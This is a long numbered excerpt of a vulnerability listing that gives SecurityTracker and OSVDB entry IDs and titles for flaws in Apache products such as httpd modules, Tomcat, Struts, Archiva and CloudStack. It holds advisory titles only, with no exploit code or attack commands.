7829| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
7830| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
7831| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
7832| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
7833| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
7834| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
7835| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
7836| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
7837| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
7838| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
7839| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
7840| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
7841| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
7842| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
7843| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
7844| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
7845| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
7846| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
7847| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
7848| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
7849| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
7850| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
7851| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
7852| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
7853| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
7854| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
7855| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
7856| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
7857| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
7858| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
7859| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
7860| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
7861| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
7862| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
7863| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
7864| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
7865| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
7866| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
7867| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
7868| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
7869| [1024096] Apache mod_proxy_http May Return Results for a Different Request
7870| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
7871| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
7872| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
7873| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
7874| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
7875| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
7876| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
7877| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
7878| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
7879| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
7880| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
7881| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
7882| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
7883| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
7884| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
7885| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
7886| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
7887| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
7888| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
7889| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
7890| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
7891| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
7892| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
7893| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
7894| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
7895| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
7896| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
7897| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
7898| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
7899| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
7900| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
7901| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
7902| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
7903| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
7904| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
7905| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
7906| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
7907| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
7908| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
7909| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
7910| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
7911| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
7912| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
7913| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
7914| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
7915| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
7916| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
7917| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
7918| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
7919| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
7920| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
7921| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
7922| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
7923| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
7924| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
7925| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
7926| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
7927| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
7928| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
7929| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
7930| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
7931| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
7932| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
7933| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
7934| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
7935| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
7936| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
7937| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
7938| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
7939| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
7940| [1008920] Apache mod_digest May Validate Replayed Client Responses
7941| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
7942| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
7943| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
7944| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
7945| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
7946| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
7947| [1008030] Apache mod_rewrite Contains a Buffer Overflow
7948| [1008029] Apache mod_alias Contains a Buffer Overflow
7949| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
7950| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
7951| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
7952| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
7953| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
7954| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
7955| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
7956| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
7957| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
7958| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
7959| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
7960| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
7961| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
7962| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
7963| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
7964| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
7965| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
7966| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
7967| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
7968| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
7969| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
7970| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
7971| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
7972| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
7973| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
7974| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
7975| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
7976| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
7977| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
7978| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
7979| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
7980| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
7981| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
7982| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
7983| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
7984| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
7985| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
7986| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
7987| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
7988| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
7989| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
7990| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
7991| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
7992| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
7993| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
7994| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
7995| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
7996| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
7997| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
7998| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
7999| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
8000| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
8001| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
8002| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
8003| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
8004| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
8005|
8006| OSVDB - http://www.osvdb.org:
8007| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
8008| [96077] Apache CloudStack Global Settings Multiple Field XSS
8009| [96076] Apache CloudStack Instances Menu Display Name Field XSS
8010| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
8011| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
8012| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
8013| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
8014| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
8015| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
8016| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
8017| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
8018| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
8019| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8020| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
8021| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
8022| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
8023| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
8024| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8025| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
8026| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
8027| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
8028| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
8029| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
8030| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
8031| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
8032| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
8033| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
8034| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
8035| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
8036| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
8037| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
8038| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
8039| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
8040| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
8041| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
8042| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
8043| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
8044| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
8045| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
| [94279] Apache Qpid CA Certificate Validation Bypass
| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
| [94042] Apache Axis JAX-WS Java Unspecified Exposure
| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
| [93541] Apache Solr json.wrf Callback XSS
| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
| [93521] Apache jUDDI Security API Token Session Persistence Weakness
| [93520] Apache CloudStack Default SSL Key Weakness
| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
| [93515] Apache HBase table.jsp name Parameter XSS
| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
| [93252] Apache Tomcat FORM Authenticator Session Fixation
| [93172] Apache Camel camel/endpoints/ Endpoint XSS
| [93171] Apache Sling HtmlResponse Error Message XSS
| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
| [93168] Apache Click ErrorReport.java id Parameter XSS
| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
| [93144] Apache Solr Admin Command Execution CSRF
| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
| [92748] Apache CloudStack VM Console Access Restriction Bypass
| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
| [92706] Apache ActiveMQ Debug Log Rendering XSS
| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
| [92270] Apache Tomcat Unspecified CSRF
| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
